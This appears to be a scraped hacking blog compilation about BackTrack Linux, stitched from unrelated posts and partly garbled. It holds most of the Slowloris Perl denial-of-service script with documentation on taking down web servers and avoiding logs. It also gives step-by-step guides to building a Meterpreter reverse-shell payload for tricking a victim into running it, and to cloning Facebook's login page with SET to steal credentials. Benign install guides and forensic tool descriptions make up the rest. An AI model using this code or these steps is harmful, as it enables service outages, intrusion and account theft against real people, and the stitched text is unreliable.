BackTrack 5 R3 allows you to gain the Facebook cookies of any person you wish. Cookies will allow you to login at websites without inserting the username and password like you usually would do.
unless ($host) { print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n"; print "\n\tType 'perldoc $0' for help with options.\n\n"; exit; }
unless ($port) { $port = 80; print "Defaulting to port 80.\n"; }
unless ($tcpto) { $tcpto = 5; print "Defaulting to a 5 second tcp connection timeout.\n"; }
unless ($test) { unless ($timeout) { $timeout = 100; print "Defaulting to a 100 second re-try timeout.\n"; } unless ($connections) { $connections = 1000; print "Defaulting to 1000 connections.\n"; } }
my $usemultithreading = 0; if ( $Config{usethreads} ) { print "Multithreading enabled.\n"; $usemultithreading = 1; use threads; use threads::shared; } else { print "No multithreading capabilites found!\n"; print "Slowloris will be slower than normal as a result.\n"; }
my $packetcount : shared = 0; my $failed : shared = 0; my $connectioncount : shared = 0;
if ($test) { my @times = ( "2", "30", "90", "240", "500" ); my $totaltime = 0; foreach (@times) { $totaltime = $totaltime + $_; } $totaltime = $totaltime / 60; print "This test could take up to $totaltime minutes.\n";
my $delay = 0; my $working = 0; my $sock;
if ($ssl) { if ( $sock = new IO::Socket::SSL( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working = 1; } } else { if ( $sock = new IO::Socket::INET( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working = 1; } } if ($working) { if ($cache) { $rand = "?" . int( rand(99999999999999) ); } else { $rand = ""; } my $primarypayload = "GET /$rand HTTP/1.1\r\n" . "Host: $sendhost\r\n" . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" . "Content-Length: 42\r\n"; if ( print $sock $primarypayload ) { print "Connection successful, now comes the waiting game...\n"; } else { print "That's odd - I connected but couldn't send the data to $host:$port.\n"; print "Is something wrong?\nDying.\n"; exit; } } else { print "Uhm... I can't connect to $host:$port.\n"; print "Is something wrong?\nDying.\n"; exit; } for ( my $i = 0 ; $i <= $#times ; $i++ ) { print "Trying a $times[$i] second delay: \n"; sleep( $times[$i] ); if ( print $sock "X-a: b\r\n" ) { print "\tWorked.\n"; $delay = $times[$i]; } else { if ( $SIG{__WARN__} ) { $delay = $times[ $i - 1 ]; last; } print "\tFailed after $times[$i] seconds.\n"; } }
if ( print $sock "Connection: Close\r\n\r\n" ) { print "Okay that's enough time. Slowloris closed the socket.\n"; print "Use $delay seconds for -timeout.\n"; exit; } else { print "Remote server closed socket.\n"; print "Use $delay seconds for -timeout.\n"; exit; } if ( $delay < 166 ) { print <<EOSUCKS2BU; Since the timeout ended up being so small ($delay seconds) and it generally takes between 200-500 threads for most servers and assuming any latency at all... you might have trouble using Slowloris against this target. You can tweak the -timeout flag down to less than 10 seconds but it still may not build the sockets in time. EOSUCKS2BU } } else { print "Connecting to $host:$port every $timeout seconds with $connections sockets:\n";
sub doconnections { my ( $num, $usemultithreading ) = @_; my ( @first, @sock, @working ); my $failedconnections = 0; $working[$_] = 0 foreach ( 1 .. $num ); #initializing $first[$_] = 0 foreach ( 1 .. $num ); #initializing while (1) { $failedconnections = 0; print "\t\tBuilding sockets.\n"; foreach my $z ( 1 .. $num ) { if ( $working[$z] == 0 ) { if ($ssl) { if ( $sock[$z] = new IO::Socket::SSL( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working[$z] = 1; } else { $working[$z] = 0; } } else { if ( $sock[$z] = new IO::Socket::INET( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working[$z] = 1; $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK } else { $working[$z] = 0; } } if ( $working[$z] == 1 ) { if ($cache) { $rand = "?" . int( rand(99999999999999) ); } else { $rand = ""; } my $primarypayload = "$method /$rand HTTP/1.1\r\n" . "Host: $sendhost\r\n" . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" . "Content-Length: 42\r\n"; my $handle = $sock[$z]; if ($handle) { print $handle "$primarypayload"; if ( $SIG{__WARN__} ) { $working[$z] = 0; close $handle; $failed++; $failedconnections++; } else { $packetcount++; $working[$z] = 1; } } else { $working[$z] = 0; $failed++; $failedconnections++; } } else { $working[$z] = 0; $failed++; $failedconnections++; } } } print "\t\tSending data.\n"; foreach my $z ( 1 .. $num ) { if ( $working[$z] == 1 ) { if ( $sock[$z] ) { my $handle = $sock[$z]; if ( print $handle "X-a: b\r\n" ) { $working[$z] = 1; $packetcount++; } else { $working[$z] = 0; #debugging info $failed++; $failedconnections++; } } else { $working[$z] = 0; #debugging info $failed++; $failedconnections++; } } } print "Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n"; sleep($timeout); } }
sub domultithreading { my ($num) = @_; my @thrs; my $i = 0; my $connectionsperthread = 50; while ( $i < $num ) { $thrs[$i] = threads->create( \&doconnections, $connectionsperthread, 1 ); $i += $connectionsperthread; } my @threadslist = threads->list(); while ( $#threadslist > 0 ) { $failed = 0; } }
__END__
=head1 TITLE
Slowloris
=head1 VERSION
Version 0.7 Beta
=head1 DATE
06/17/2009
=head1 AUTHOR
RSnake <h@ckers.org> with threading from John Kinsella
=head1 ABSTRACT
Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service. It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively. It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons.
Slowloris is designed so that a single machine (probably a Linux/UNIX machine since Windows appears to limit how many sockets you can have open at any given time) can easily tie up a typical web server or proxy server by locking up all of it's threads as they patiently wait for more data. Some servers may have a smaller tolerance for timeouts than others, but Slowloris can compensate for that by customizing the timeouts. There is an added function to help you get started with finding the right sized timeouts as well.
As a side note, Slowloris does not consume a lot of resources so modern operating systems don't have a need to start shutting down sockets when they come under attack, which actually in turn makes Slowloris better than a typical flooder in certain circumstances. Think of Slowloris as the HTTP equivalent of a SYN flood.
=head2 Testing
If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing:
This won't give you a perfect number, but it should give you a pretty good guess as to where to shoot for. If you really must know the exact number, you may want to mess with the @times array (although I wouldn't suggest that unless you know what you're doing).
=head2 HTTP DoS
Once you find a timeout window, you can tune Slowloris to use certain timeout windows. For instance, if you know that the server has a timeout of 3000 seconds, but the the connection is fairly latent you may want to make the timeout window 2000 seconds and increase the TCP timeout to 5 seconds. The following example uses 500 sockets. Most average Apache servers, for instance, tend to fall down between 400-600 sockets with a default configuration. Some are less than 300. The smaller the timeout the faster you will consume all the available resources as other sockets that are in use become available - this would be solved by threading, but that's for a future revision. The closer you can get to the exact number of sockets, the better, because that will reduce the amount of tries (and associated bandwidth) that Slowloris will make to be successful. Slowloris has no way to identify if it's successful or not though.
HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a POST verses a GET or HEAD request with the -httpready switch.
If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a seperate virtual host using the -shost variable. This way the logs that are created will go to a different virtual host log file, but only if they are kept separately.
Slowloris does support SSL/TLS on an experimental basis with the -https switch. The usefulness of this particular option has not been thoroughly tested, and in fact has not proved to be particularly effective in the very few tests I performed during the early phases of development. Your mileage may vary.
Slowloris does support cache avoidance on an experimental basis with the -cache switch. Some caching servers may look at the request path part of the header, but by sending different requests each time you can abuse more resources. The usefulness of this particular option has not been thoroughly tested. Your mileage may vary.
Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscalar devices, in it's current incarnation. They may be ways around this, but not in this version at this time. Most likely most anti-DDoS and load balancers won't be thwarted by Slowloris, unless Slowloris is extremely distrubted, although only Netscalar has been tested.
Slowloris isn't completely quiet either, because it can't be. Firstly, it does send out quite a few packets (although far far less than a typical GET request flooder). So it's not invisible if the traffic to the site is typically fairly low. On higher traffic sites it will unlikely that it is noticed in the log files - although you may have trouble taking down a larger site with just one machine, depending on their architecture.
For some reason Slowloris works way better if run from a *Nix box than from Windows. I would guess that it's probably to do with the fact that Windows limits the amount of open sockets you can have at once to a fairly small number. If you find that you can't open any more ports than ~130 or so on any server you test - you're probably running into this "feature" of modern operating systems. Either way, this program seems to work best if run from FreeBSD.
Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the web server or proxy server will write to it's logs with a lot of 400 (Bad Request) errors. So while the sockets remain open, you won't be in the logs, but once the sockets close you'll have quite a few entries all lined up next to one another. You will probably be easy to find if anyone is looking at their logs at that point - although the DoS will be over by that point too.
=head1 What is a slow loris?
What exactly is a slow loris? It's an extremely cute but endangered mammal that happens to also be poisonous. Check this out:
In this tutorial i will show you how to install Backtrack 5 R3 which is recently released by offensive security team . if you've previously installed backtrack then you might be familiar with backtrack installations . its easy and simple just follow given simple steps.
Stage 1 Requirements 1 : Download backtrack ISO from here 2 : Download VMware Workstation or VMplayer 3 : Install any of above Stage 2
Installation
1 : Create A new virtual machine
2 : choose installer ISO ( choose backtrack 5 ISO )
3 : chooseLinux as your guest operating system type and Ubuntuas version
4 : give a name and location of your backtrack VM
5 : Specify virtual hard drive space ( 20 GB is good enough )
then click finish from ready to create vm window
hit enter to go boot screen then choosedefault boot text modeand hit enter
Recently, released the long-awaited BackTrack 5 R3 but for those of you who don’t want to start fresh with a new installation, have no fear because you can easily upgrade your existing installation of R2 to R3.
Our primary focus with this release was on the implementation of various bug fixes, numerous tools upgrades and well over 60 new additions to the BackTrack suite. Because of this, the upgrade path to BackTrack 5 R3 is relatively quick and painless.
First, you will want to make sure that your existing system is fully updated:
apt-get update&&apt-get dist-upgrade
With the dist-upgrade finished, all that remains is the install the new tools that have been added for R3. An important point to keep in mind is that there are slight differences between the 32-bit and 64-bit tools so make sure you choose the right one.
"The time has come to refresh our security tool arsenal – BackTrack 5 R3 has been released. R3 focuses on bug-fixes as well as the addition of over 60 new tools – several of which were released in BlackHat and Defcon 2012. A whole new tool category was populated – “Physical Exploitation”, which now includes tools such as the Arduino IDE and libraries, as well as the Kautilya Teensy payload collection." The Backtrack team has finally released a single VMware Image (Gnome, 32 bit) for those who want other backtrack flavors. For those requiring other VM flavors of BackTrack – building your own VMWare image is easy – instructions can be found in the BackTrack Wiki."For the insanely impatient, you can download the BackTrack 5 R3 release via torrent right now. Direct ISO downloads will be available once all Backtrack HTTP mirrors have synched, which should take a bit more time. Once this happens, the team will update our BackTrack Download page with all links."
In this article i am gonna show you how to easily you can uninstall your backtrack series (3,4,5) from your hard-disk when you are using it with another
operating system like a windows 7 or windows xp.
so let we start, we need one bootable windows 7 cd ( if you have dual booted with xp then use xp bootable )
now put bootable dvd or pendrive in to your system and restart it.
well select repair windows option or press R button keys when installation menu comes up
now choose command prompt
now type
Bootrec.exe /fixmbr
this will load standard windows boot menu and remove Ubuntu grub,
3. Now click on Device manager,you can see your backtrack partition ( it won't con tain name like C drive or D drive but you can verify with 76 gb of partition and 3 gb of partition )
4. delete volume,Reboot your system,voila you have done
1. Open the drive containing the folder. 2. Select the folder to rename it. or by simply pressing F2 after selecting the folder.
3. Rename the folder by putting a “.” (dot) in front of current name. Press ENTER.
4. The folder is now ready to be hidden.
Viewing the Hidden File or Folder :
Proceed in the following steps to view the folder you have hidden : 1. Navigate to the location of the hidden folder. 2. In the menu bar, click the “View” tab and select to check the box next to “Show Hidden Files”. This can also be done by simply pressing “Ctrl + H”. Your hidden folder appears to you, enabling you to access it right away. This of-course doesn’t change the hidden property of the folder. Re-hiding the folder involves just clicking on the “View” tab once more and un-checking the box next to “Show Hidden Files” or pressing “Ctrl + H” once again.
Un-hiding the File or Folder :
Un-hiding a hidden file or folder in Linux is a much simpler task. The process is described below : 1. Follow the steps to view the hidden folder as mentioned above. 2. After the folder can be viewed, select to rename it once again. 3. Just remove the “.” (dot) you had placed at the beginning of the name of the folder and press ENTER. The folder has been un-hidden. Hiding a file or a folder is a basic example of the highest level of security that Linux provides its users with. This, and a lot more makes Linux the “numero uno” operating system for a secure workstation.
I'm trying to write 5 most useful things you should know in Backtrack Linux. Please check it below.
1. About user name and password
Backtrack use root for the username and toor for the password. You should provide it at the first time login in your first time installation.
2.startxcommand.
Don't shocked if you see the black screen with command only when you use backtrack. Backtrack designed to use command line, but if you want to enable the window, you can typestartxcommand after you log in.
3. Metasploit Framework
The most famous tools in Backtrack is Metasploit framework, this tools is used for penetration testing into vulnerable system. You can go to metasploit framework by typing /pentest/exploits/framework3/msfconsole, and there's also /pentest/exploits/framework2/msfconsole.
4. Log Out
In Backtrack, you cannot restart or shutdown your computer from X-Window. One thing you can do when you finish use backtrack from X-Window is Log Out. To do this, click the Dragon icon at the bottom left of your Backtrack and then Click Log Out.
5. Shutdown, Restart
When you finish use the X-Windows, you will be inside the terminal again. To shutdown your Backtrack : poweroff To restart your Backtrack : reboot
BackTrack 4 is an penetration testing tool that is run as an live CD , it is an modded form of Linx(Ubuntu) that can be used for hacking.In this tutorial I will show you how to generate payloads in it.
In this tutorial we will be using a useful tool on Backtrack 4 to create a payload which we will then send a slave, the payload created is in exe, once the slave is Social Engineered into running the payload, A meterpreter session will appear to us. We will set it up with a listener on a port, meaning we will have a shell prompt open, waiting for a connection from the slave, once this occurs we have a session, and entry to the victims machine.
Start by opening Bt 4 etc, then scroll to Backtrack, Penetration, Fast-Track, Fast-Track interactive, this will open a prompt like below.
Choose option 7, it will then ask what exploit you want to use, choose exploit 2.
It will then ask you for an Ip address, you can either enter your own, or the victims, its easier to enter our own (the listener). To obtain your IP on Backtrack 4, open a shall and type ifconfig, your IP appears after inet addr, like below.
It will then ask you to choose a port for the listener, choose a random port that isnt in use, for this we will use port 4444, and then choose the payload to be compiled in exe format rather than shell script (text). Also choose yes on starting a listener, this basically means a shell will be opened blank, waiting for the slave to run the exe, once run the connection is made, and the listening shell will then spawn the meterpreter session between your and the victims machine.
At this point, the payload has been created, and the listener has launched, all you have to do now is locate the payload, I would advise you to rename it, Social Engineer the slave into running it, and then check your listening shell for a connection. If successful you will then have a meterpreter session opened and entry to the victims machine.
Below is the location of the payload you will send.
In my previous tutorial I have explained “ How to hack facebook account using phishing ” , Now in this tutorial I am going to show you how to hack Facebook account using backtrack 5. So just follow the simple steps. Open your backtrack 5’s terminal and type cd /pentest/exploits/set
Now Open social Engineering Tool kit (SET) ./set
Just hit ENTER and SET will Open , Now just select 1st option (1 Social-Engineering Attacks) and hit enter after that 2nd number (just type 2 as shown in snapshot)
Now Just select 4th Option “Tabnabbing Attack Method” and Hit ENTER
Then select 2nd option “Site Cloner” and Hit ENTER
Now here you need to add the URL of Facebook (if you want to hack gmail then just add the gmail’s URL)
Now just hit the enter.
Open new terminal and just type ifconfigand hit ENTER
Now just copy this IP address and open it in Browser.
Now here I am just typing test email and password to see whether it works or not.
Now just hit enter and switch back to our terminal and we found the Email and password ! This tutorial is just educational purpose only.
pdfbook.py is a utility that gathers information relating to Facebook from a process dump. On a Windows system, run “pd -p [pid] > file.dump” where [pid] is the process ID of a browser, then on a Linux system run “strings -el file.dump > fbookstrings”. Finally, we use pdfbook.py on the fbookstrings file resulting from the strings command. Example Usage:pdfbook.py -f fbookstrings
pdgmail
pdgmail.py is a utility similar to pdfbook.py, but instead of gathering Facebook information from process dumps, it gathers Gmail information. On a Windows system, run “pd -p [pid] > file.dump” where [pid] is the process ID of a browser, then on a Linux system run “strings -el file.dump > gmailstrings”. Finally, we use pdgmail.py on the gmailstrings file resulting from the strings command.
Example Usage:pdgmail.py -f gmailstrings
PTK
PTK is a forensics toolkit, similar to the Sleuthkit toolkit. It contains built in modules in order to analyze nearly any type of media or filetype that may be encountered in a forensics investigation. It is browser based, and first needs to have a MySQL database configured. Leave all fields as default, and use the password “toor” for the root user in MySQL. It should setup successfully, at which point you need to register for the free version. Copy the license file you received into the config directory for PTK located at /var/www/ptk/config. Next, log in as either admin or investigator, and open a new case. Fill out the necessary information, then add an image file to begin. It can even be a RAM dump. From here, the built in tools will help you pull information from the image(s).
Volatility
Volatility is a framework writen in Python that specializes in RAM analysis. The Volatility Framework can analyze volatile memory dumps from any system type, and can provide a deep insight into the state of the system while it was running. The Volatility Framework has been tested on Windows, OS X, Linux, and even Cygwin. In the example below, we use Volatility in order to list processes that were running on the system while the RAM image ram.img was taken.
pdfid is a utility that can extract useful information from a PDF file. Specifically, pdfid extracts header information from the PDF such as obj, endobj, stream and other information. Some PDF exploits alter this information, so pdfid can sometimes show the user what exactly is going on inside of the PDF. In this example, we simply gather information from a PDF file called file.pdf. Example Usage: pdfid.py file.pdf
pdf-parser
pdf-parser is a program used to display detailed information about a PDF file. A very useful feature is the ability to run a stream of data thorugh a filter, such as FlateDecode and ASCIIHexDecode. These filters are sometimes used to obfuscate code in PDF files, so this feature can help expose exploit attempts. In addition to this, pdf-parser can display individual object and data streams, as well as provide statistics for the PDF document. In the example below, we use pdf-parser to provide an overview of the file.pdf PDF file using the –stats option.
Example Usage:pdf-parser.py –stats file.pdf nbsp;
peepdf
peepdf is a very thorough utility that is used to analyze and edit PDF documents on the byte level. It offers the basic command line usage, but also offers an in depth interactive console. The command line usage provides a more basic overview of the PDF file, while the interactive console provides more powerful functions. In the first example, we use peepdf to provide an overview of file.pdf, while the second one shows how to enter interactive mode using file.pdf.
Example Usage:peepdf.py file.pdf Example Usage:peepdf.py -i file.pdf
CmosPwd is a BIOS password cracker. With support for many different models of BIOS, CmosPwd has different methods of cracking for each type of BIOS. Since a BIOS password prevents you from booting on that computer, it does require some physical manipulation. Once you get the hardware aspect out of the way, usage is very easy. In the following example, we kill CMOS all together.
Example Usage: cmospwd /k
fcrackzip
fcrackzip is a utility used to crack Zip file password protection. There are many Zip crackers out there, however, fcrackzip excels in speed and features, especially the brute force option. It is very easy to use, and in the examples below, we use it to crack a zip file called crack.zip using a brute force method and a dictionary based attack taking passwords from passwords.txt.
Example Usage:fcrackzip -b crack.zip Example Usage:fcrackzip -D -p passwords.txt crack.zip
samdump
Samdump is a utility that can extract password hashes from SAM files. SAM files are the files located on Windows based systems that contain the passwords for local users. By using samdump, you can retrieve the password hashes, and then use them for cracking with another program. In this example, we retrieve hashes from an exported SAM file named sam.file.
Driftnet is a network utility that sniffs traffic for images and other media, and displays them in an X window. This is useful during investigations where users’ Internet habits are being monitored. Rather than sniffer all traffic using utilities like Wireshark, Driftnet makes it easier by automatically picking out images and media and displaying it to the user. In the example below, we use the wireless interface wlan0 in promiscuous mode to capture traffic, and instruct driftnet to be verbose in its output.
Example Usage: driftnet -i wlan0 -v  
p0f
p0f is a passive host identifier. p0f uses a fingerprinting technqiue that looks at the structure of TCP/IP packets from the host in order to guess the operating system and other properties of the host. What sets p0f apart from other host analyzers is that p0f is completely passive. All the host has to do is connect to the same network or be contacted by another host on the network. The packets generated through these transactions are enough to give p0f enough data to guess the system. Note that you need a file containing fingerprints in order to identify hosts. In this example, we read fingerprints from /etc/p0f/p0f.fp and listens on wlan0 via libpcap.
Example Usage:p0f -f /etc/p0f/p0f.fp -i wlan0
tcpreplay
tcpreplay is a suite of network utilities that can take previously sniffed traffic and replay the packets onto the live network. This is often used for testing devices on the network, such as firewalls or Intrusion Prevention/Detection Systems (IPS/IDS). The suite itself consists of tcpprep, tcprewrite, tcpreplay, tcpreplay-edit, tcpbridge, and tcpcapinfo.
tcpprep: analyze packet capture files to determine client/server and create caches for use by tcpreplay and tcprewrite tcprewrite: edit packet capture files in Layer 2 headers tcpreplay: inject packet capture files back into the live network tcpreplay-edit: replay and edit files into the network tcpbridge: bridge two sections of a network together using tcprewrite tcpcapinfo: decode raw packet capture files and debug them
Wireshark
Wireshark is the famous packet capture and analysis program that has been used by thousand of professionals and amateurs alike. The program allows users to listen in on a network interface using libpcap, and logs the traffic sniffed. In addition to capturing the data, Wireshark provides an easy, graphical method to filter and analyze the traffic. This includes following TCP/IP streams, filtering out ARP or broadcast packets, and virtually any other filtering option you can imagine.
Xplico
Xplico is a Network Forensic Analysis Tool (NFAT) that specializes in extracting application data from packet capture files. Although it includes a live traffic capture feature, it is best suited for pcap anaylsis. Xplico can extract email, HTTP, VoIP, FTP, and other data directly from the pcap file, and presents it to the user as the original application data. For example, it can reconstruct an image sent via FTP from the packet capture of the FTP session. In the example below, we use Xplico to decode the information from capture.pcap.
PTK is a forensics toolkit, similar to the Sleuthkit toolkit. It contains built in modules in order to analyze nearly any type of media or filetype that may be encountered in a forensics investigation. It is browser based, and first needs to have a MySQL database configured. Leave all fields as default, and use the password “toor” for the root user in MySQL. It should setup successfully, at which point you need to register for the free version. Copy the license file you received into the config directory for PTK located at /var/www/ptk/config. Next, log in as either admin or investigator, and open a new case. Fill out the necessary information, then add an image file to begin. It can even be a RAM dump. From here, the built in tools will help you pull information from the image(s).
setup autopsy
Autopsy is a GUI (uses web interface) to tools found in the Sleuthkit forensics toolkit. Autopsy specializes in analyzing disk images, and can retrieve information from them using search or browse functions. For a tutorial on retrieving “deleted” information from a disk, take a look at this Autopsy Tutorial.
Sleuthkit is a forensic toolkit containing many utilities that can be used in a digital forensics investigation. Sleuthkit is the official successor of The Coroner’s Toolkit (TCT). Sleuthkit itself is not a program, rather it is the name given to the collection of many programs. Some of these included utilities are: ils, blkls, fls, fsstat, ffind, mactime, disk_stat. The below example shows how to use MACTime in order to recursively list files that have been accessed since 1/1/2011:
AIR, or Automated Image and Restore, is a utility used to create forensics-grade disk images from device drives. AIR itself is a GUI frontend for dd/dc3dd, which is the program that is actually used to create the image. On Backtrack, when you first select air, it will download and compile the necessary components to run the program. From here, the GUI is easy to use.
AIR GUI
dc3dd
dc3dd is an altered version of dd, the utility that is used to operate low level disk functions. dc3dd contains several features that are of great use to forensics investigates, including features that help safeguard the original disk being copied. The example below shows how to split a large disk image into smaller pieces, which is extremely useful when dealing with image files that are too large to be moved around easily. It takes /dev/sda as the input file, calculates hashes for the individual new files and the original large file, splits the large file into 2 GB pieces with “000″ as a suffix in the filename, logs all data to /root/Desktop/log.txt, and outputs the smaller files to /root/Desktop/images Example usage: dc3dd if=/dev/sda progress=on hashconv=after hash=md5,sha1 hashwindow=2GB splitformat=000 split=2GB log=/root/Desktop/log.txt bs=512 iflag=direct conv=noerror, sync of=/root/Desktop/images
ddrescue
ddrescue is a tool used to copy data from a file or device to another. In the case of a damaged device, it attempts to reconstruct the damaged areas, unlike dd, which simply fills the damaged areas with zeros. ddrescue can also be used to merge damaged copies a file together, created a single copy of the file with (hopefully) no damage. Here is an example of ddrescue being used, as found on their website. Together, these commands are used to rescue a disk containing 3 ext2 partitions, including using a logfile and e2fsck to check the filesystems.
Example usage: ddrescue -f -n /dev/hda /dev/hdb logfile Example usage: ddrescue -d -f -r3 /dev/hda /dev/hdb logfile Example usage: fdisk /dev/hdb Example usage: e2fsck -v -f /dev/hdb1 Example usage: e2fsck -v -f /dev/hdb2
ewfacquire
ewfacquire is a tool used to create disk images in the EWF format. EWF formatted images are used in several forensic toolkits, including the EnCase and FTK (Forensic Toolkit). It includes several message digests including MD5 and SHA1. The example below shows ewfacquire creating an image from /dev/sdb1, creating a SHA1 message digest, and logging data to /root/Desktop/log.txt
Example usage: ewfacquire -d sha1 -l /root/Desktop/log.txt /dev/sdb1
Hashdeep is a utility that can compute hashes for many files, looking recursively through directories and computing hashes for each file found. It also contains features to compare and audit message digests. By default, it computes the MD5 and SHA256 hash of the files, although other types can be specified. Available hash types are MD5, SHA1, SHA256, Tiger, and Whirlpool. The below example generates MD5 and SHA256 hashes (same as default no -c given) for files in the /root/Desktop/files/ directory.
Example usage: hashdeep -c md5,sha256 /root/Desktop/files/
md5deep
md5deep is a tool used to compute and compare MD5 message digests. The example below recursively creates MD5 message digests of files found in /root/Desktop/ Example usage: md5deep /root/Desktop/*
sha1deep
Like md5deep, sha1deep is used to computer and compare message digests. Sha1deep deals with SHA1 digests. The usage is the same as md5deep, and the below example creates SHA1 digests of files found in /root/Desktop/ Example usage: sha1deep /root/Desktop/*
sha256deep
Like md5deep, sha256deep is used to computer and compare message digests. Sha256deep deals with SHA256 digests. The usage is the same as md5deep, and the below example creates SHA256 digests of files found in /root/Desktop/
Example usage: sha256deep /root/Desktop/*
tigerdeep
Like md5deep,tigerdeep is used to computer and compare message digests. tigerdeep deals with tiger digests. The usage is the same as md5deep, and the below example creates tiger digests of files found in /root/Desktop/
Example usage: tigerdeep /root/Desktop/*
whirlpooldeep
Like md5deep, whirlpooldeep is used to computer and compare message digests. whirlpooldeep deals with whirlpool digests. The usage is the same as md5deep, and the below example creates whirlpool digests of files found in /root/Desktop/
![Installing backtrack 5 R3 in virtual machine step by step [ how to ]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsafVKTICv7EgS8QZqMHMdJ_5doC7Snm1arCGoQ_YcGQbFPGVnlcj-875o9-X0zM3k9XNMNLLOY1whcyyoqTs5f510NKUFz3tmekQRZtVaPg69qnemrYU8sTgm5LihnX8r_kPjr1Z35q10/s1600/vm1.png "Installing backtrack 5 R3 in virtual machine step by step [ how to ]")
![Installing backtrack 5 R3 in virtual machine step by step [ how to ]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKhmfcnM6WMUZARj63r25rhbLnpCC9hXfh86kQ5843gWgxD055XimveI2A370D5M77B4-PJBLtflmKdhWoW3cvA0QsjwV1mxaCTSvHLzhj75c5crBrnFpsV3C9b4ouFTkUyDz-1gIfP4O1/s640/vm2.png "Installing backtrack 5 R3 in virtual machine step by step [ how to ]")
![[Image: tut1.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vakt65a7_gatqY4AipsEYvLQDF6GMtTi8Ng762U8CcOwxY3f7hOS3foLaYPQjKr03WXFjxrBN7IaaRsmWbDDV17FubSunKZNZ_D2V8tUpHGJwAd_liAi6WDC40=s0-d)
![[Image: tut2.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tMX6b_ySPyMMvOU5cSrme8s8mFch6JlTqJGC1A_Yre_QamEQHpiHGbQ1b0XG6ywCh1F9e8Ao_xtsqtR38du4S4p6eAw5hGRlJSo3iYuQQiMGJbYafhSL-8U0q_=s0-d)
![[Image: tut3-1.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tiCZrFjKPJXI-sUxyQM54ESQ2B-Xt7UHJNlK8ZetfRCPT2vZMCvvRu21N5uYXtY2h9Rvf-6jR2EFmzPFLgTrfzO0s6YOLEODyZ86MurM09aLbrNfeS-GqmxD-fPw=s0-d)
![[Image: tut5.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_srL11Iea50d-TrKjaf__MzcGBdujZoHtG43LWbHml8YtYO56xBf53xt0xgkIfG-4-_n-KylLt-pD_EfrXl7ZxWAuW2lGZKjso-IXMwLarvRXRtMkBR-n57sHYx=s0-d)
![[Image: tut7.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u3s8kQyGt1uL-rFf3ZCrCRuDHz3KqdiRoBmroPkzZ9LV1WiOHxjXgOgGP-rLFhzRcYXmd1QB2Dh70bgigL7fzSazfexEtBJacLth2cgEBpi65DCewlJjrY9d0=s0-d)
